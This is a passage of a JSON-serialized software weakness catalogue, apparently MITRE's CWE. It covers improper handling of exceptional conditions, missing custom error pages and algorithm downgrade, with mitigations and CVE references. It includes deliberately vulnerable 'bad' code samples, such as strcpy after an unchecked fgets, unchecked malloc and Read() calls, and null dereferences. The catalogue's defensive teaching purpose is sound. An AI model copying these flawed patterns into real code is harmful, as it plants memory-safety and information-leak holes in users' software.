exceptions as locally as possible so that exceptions do not propagate too far up the call stack (CWE-705). Avoid unchecked or uncaught exceptions where feasible (CWE-248).","Effectiveness":"High","Effectiveness_Notes":"Using specific exceptions, and ensuring that exceptions are checked, helps programmers to anticipate and appropriately handle many unusual events that could occur."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","Exposing additional information to a potential attacker in the context of an exceptional condition can help the attacker determine what attack vectors are most likely to succeed beyond DoS."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]},"Effectiveness_Notes":"Performing extensive input validation does not help with handling unusual conditions, but it will minimize their occurrences and will make it more difficult for attackers to trigger them."},{"attr":{"@_Mitigation_ID":"MIT-38"},"Phase":["Architecture and Design","Implementation"],"Description":"If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery."},{"Phase":"Architecture and Design","Description":"Use system limits, which should help to prevent resource exhaustion. However, the software should still handle low resource conditions since they may still occur."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-7"},"Intro_Text":"Consider the following code segment:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf);","xhtml:br":["",""]}},"Body_Text":"The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy()."},{"attr":{"@_Demonstrative_Example_ID":"DX-8"},"Intro_Text":"The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size);","xhtml:br":""}},"Body_Text":["The traditional defense of this coding error is: \\"If my program runs out of memory, it will fail. It doesn\'t matter whether I handle the error or simply allow the program to die with a segmentation fault when it tries to dereference the null pointer.\\" This argument ignores three important considerations:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue."},{"xhtml:div":"It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state."},{"xhtml:div":"The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know."}]}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-9"},"Intro_Text":"The following examples read a file into a byte array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {}","xhtml:br":"","xhtml:div":{"#text":"String userName = (String) i.Current();String pFileName = PFILE_ROOT + \\"/\\" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String userName = (String) i.next();String pFileName = PFILE_ROOT + \\"/\\" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray);","xhtml:br":["","","","","",""]}}}}],"Body_Text":"The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-10"},"Intro_Text":"The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.","The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or simply allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."]},{"attr":{"@_Demonstrative_Example_ID":"DX-11"},"Intro_Text":"The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"System.clearProperty(\\"os.name\\");...String os = System.getProperty(\\"os.name\\");if (os.equalsIgnoreCase(\\"Windows 95\\")) System.out.println(\\"Not supported\\");","xhtml:br":["","",""]}},"Body_Text":"The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or simply allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."},{"attr":{"@_Demonstrative_Example_ID":"DX-12"},"Intro_Text":"The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"Dim MyFile As New FileStream(\\"myfile.txt\\", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20))","xhtml:br":["","",""]}},"Body_Text":"In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference\\n\\t (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"Intro_Text":"In the following C/C++ example the method outputStringToFile opens a file in the local filesystem and outputs a string to the file. The input parameters output and filename contain the string to output to the file and the name of the file respectively.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"int outputStringToFile(char *output, char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"openFileToWrite(filename);writeToFile(output);closeFile(filename);","xhtml:br":["","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"int outputStringToFile(char *output, char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isOutput = SUCCESS;int isOpen = openFileToWrite(filename);if (isOpen == FAIL) {}else {}return isOutput;","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to open file %s\\", filename);isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int isWrite = writeToFile(output);if (isWrite == FAIL) {}int isClose = closeFile(filename);if (isClose == FAIL)","xhtml:br":["","","",""],"xhtml:div":[{"#text":"printf(\\"Unable to write to file %s\\", filename);isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"isOutput = FAIL;","attr":{"@_style":"margin-left:10px;"}}]}}]}}}}],"Body_Text":"However, this code does not check the return values of the methods openFileToWrite, writeToFile, closeFile to verify that the file was properly opened and closed and that the string was successfully written to the file. The return values for these methods should be checked to determine if the method was successful and allow for detection of errors or unexpected conditions as in the following example."},{"Intro_Text":"In the following Java example the method readFromFile uses a FileReader object to read the contents of a file. The FileReader object is created using the File object readFile, the readFile object is initialized using the setInputFile method. The setInputFile method should be called before calling the readFromFile method.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private File readFile = null;public void setInputFile(String inputFile) {}public void readFromFile() {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// create readFile File object from string containing name of file"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FileNotFoundException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"reader = new FileReader(readFile);","xhtml:br":["","",""],"xhtml:i":"// read input file"}}}}]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private File readFile = null;public void setInputFile(String inputFile) {}public void readFromFile() {}","xhtml:br":["","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// create readFile File object from string containing name of file"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {} catch (FileNotFoundException ex) {...}catch (NullPointerException ex) {...}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (readFile == null) {}reader = new FileReader(readFile);","xhtml:div":{"#text":"System.err.println(\\"Input file has not been set, call setInputFile method before calling openInputFile\\");throw NullPointerException;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["","","","",""],"xhtml:i":"// read input file"}},"xhtml:br":""}}]}}],"Body_Text":"However, the readFromFile method does not check to see if the readFile object is null, i.e. has not been initialized, before creating the FileReader object and reading from the input file. The readFromFile method should verify whether the readFile object is null and output an error message and raise an exception if the readFile object is null, as in the following code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-3798","Description":"Unchecked return value leads to resultant integer overflow and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798"},{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP31-PL","Entry_Name":"Do not suppress or ignore exceptions","Mapping_Fit":"CWE More Abstract"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Program Building Blocks" Page 341"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 1, "Exceptional Conditions," Page 22"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 11: Failure to Handle Errors Correctly." Page 183"}},{"attr":{"@_External_Reference_ID":"REF-622"}}]},"Notes":{"Note":{"#text":"Sometimes, when a return value can be used to indicate an error, an unchecked return value is a code-layer instance of a missing application-layer check for exceptional conditions. However, return values are not always needed to communicate exceptional conditions. For example, expiration of resources, values passed by reference, asynchronously modified data, sockets, etc. may indicate exceptional conditions without the use of a return value.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Improper Check for Exceptional Conditions","attr":{"@_Date":"2010-02-16"}}}},"755":{"attr":{"@_ID":"755","@_Name":"Improper Handling of Exceptional Conditions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not handle or incorrectly handles an exceptional condition.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"703","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"756":{"attr":{"@_ID":"756","@_Name":"Missing Custom Error Page","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not return custom error pages to the user, possibly exposing sensitive information.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"209","@_View_ID":"1000"}}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-76"},"Intro_Text":"In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-75"},"Intro_Text":"The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used.","Body_Text":["In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned.","A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned.","Another secure option is to set the mode attribute of the <customErrors> tag to use a custom page as follows:"],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":"<customErrors mode=\\"Off\\" />"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"<customErrors mode=\\"RemoteOnly\\" />"},{"attr":{"@_Nature":"good","@_Language":"ASP.NET"},"xhtml:div":"<customErrors mode=\\"On\\" defaultRedirect=\\"YourErrorPage.htm\\" />"}]}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03","Submission_Comment":"New entry for reorganization of CWE-703."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"757":{"attr":{"@_ID":"757","@_Name":"Selection of Less-Secure Algorithm During Negotiation (\'Algorithm Downgrade\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties.","Extended_Description":"When a security mechanism can be forced to downgrade to use a less secure algorithm, this can make it easier for attackers to compromise the software by exploiting weaker algorithm. The victim might not be aware that the less secure algorithm is being used. For example, if an attacker can force a communications channel to use cleartext instead of strongly-encrypted data, then the attacker could read the channel by sniffing, instead of going through extra effort of trying to decrypt the data using brute force techniques.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-4302","Description":"Attacker can select an older version of the software to exploit its vulnerabilities.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4302"},{"Reference":"CVE-2006-4407","Description":"Improper prioritization of encryption ciphers during negotiation leads to use of a weaker cipher.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407"},{"Reference":"CVE-2005-2969","Description":"chain: SSL/TLS implementation disables a verification step (CWE-325) that enables a downgrade attack to a weaker protocol.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2969"},{"Reference":"CVE-2001-1444","Description":"Telnet protocol implementation allows downgrade to weaker authentication and encryption using an Adversary-in-the-Middle AITM attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1444"},{"Reference":"CVE-2002-1646","Description":"SSH server implementation allows override of configuration setting to use weaker authentication schemes. This may be a composite with CWE-642.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1646"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"220"}},{"attr":{"@_CAPEC_ID":"606"}},{"attr":{"@_CAPEC_ID":"620"}}]},"Notes":{"Note":{"#text":"This is related to CWE-300, although not all downgrade attacks necessarily require an entity that redirects or interferes with the network. See examples.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2009-03-03"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples"}]}},"758":{"attr":{"@_ID":"758","@_Name":"Reliance on Undefined, Unspecified, or Implementation-Defined Behavior","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses an API function, data structure, or other entity in a way that relies on properties that are not always guaranteed to hold for that entity.","Extended_Description":"This can lead to resultant weaknesses when the required properties change, such as when the software is ported to a different platform or if an interaction error (CWE-435) 